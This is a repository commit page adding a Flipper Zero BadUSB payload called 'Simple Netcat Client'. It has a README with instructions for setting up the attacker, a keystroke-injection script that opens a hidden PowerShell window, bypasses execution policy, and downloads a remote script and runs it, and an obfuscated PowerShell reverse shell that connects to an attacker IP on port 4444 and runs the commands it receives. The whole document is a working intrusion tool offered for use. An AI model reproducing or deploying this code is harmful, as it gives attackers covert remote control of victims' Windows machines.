mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2026-01-08 03:10:53 -08:00
Add files via upload
This commit is contained in:
17
Netcat-Client/README.md
Normal file
17
Netcat-Client/README.md
Normal file
@@ -0,0 +1,17 @@
|
||||
|
||||
<h2 align="center"> Simple Netcat Client </h2>
|
||||
|
||||
SYNOPSIS
|
||||
|
||||
Opens a netcat connection to a Windows machine in Powershell
|
||||
|
||||
USAGE
|
||||
|
||||
1. Download Ncat For windows. https://nmap.org/download#windows
|
||||
2. Change "YOUR IP HERE" to the attacker machine's ipv4 address (find using ipconfig on windows)
|
||||
3. Open a terminal on the attacker machine and type "nc -lvp 4444"
|
||||
4. Run this script on the client machine.
|
||||
|
||||
NOTE
|
||||
|
||||
The PORT number is 4444
|
||||
20
Netcat-Client/Simple-Netcat-Client.txt
Normal file
20
Netcat-Client/Simple-Netcat-Client.txt
Normal file
@@ -0,0 +1,20 @@
|
||||
|
||||
REM Title: Beigeworm's Simple Netcat Client
|
||||
REM Author: @beigeworm
|
||||
REM Description: This script connects target computer with a netcat session to send powershell commands.
|
||||
REM Target: Windows 10
|
||||
|
||||
REM *SETUP*
|
||||
REM replace IP_HERE with your netcat attacker IP Address.
|
||||
REM NOTE The PORT number is 4444
|
||||
|
||||
REM some setup for dukie script
|
||||
DEFAULT_DELAY 100
|
||||
|
||||
REM open powershell (remove "-W H" to show the window)
|
||||
DELAY 1000
|
||||
GUI r
|
||||
DELAY 750
|
||||
STRING powershell -NoP -Ep Bypass -W H -C $ip='IP_HERE'; irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Netcat-Client/main.ps1 | iex
|
||||
ENTER
|
||||
|
||||
14
Netcat-Client/main.ps1
Normal file
14
Netcat-Client/main.ps1
Normal file
@@ -0,0 +1,14 @@
|
||||
|
||||
do{
|
||||
$v = 4
|
||||
$a = New-Object S`ySt`em.N`eT.`s`ock`eTs.TC`PC`li`eNt("$ip",4444)
|
||||
$b = $a.GetStream();[byte[]]$c = 0..65535|%{0}
|
||||
while(($d = $b.Read($c, 0, $c.Length)) -ne 0){
|
||||
$e = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($c,0, $d)
|
||||
$f = (iex $e 2>&1 | Out-String );$g = $f + (pwd).Path + '> '
|
||||
$h = ([text.encoding]::ASCII).GetBytes($g)
|
||||
$b.Write($h,0,$h.Length)
|
||||
$b.Flush()}
|
||||
$a.Close()
|
||||
Sleep 10
|
||||
}while ($v -le 5)
|
||||
Reference in New Issue
Block a user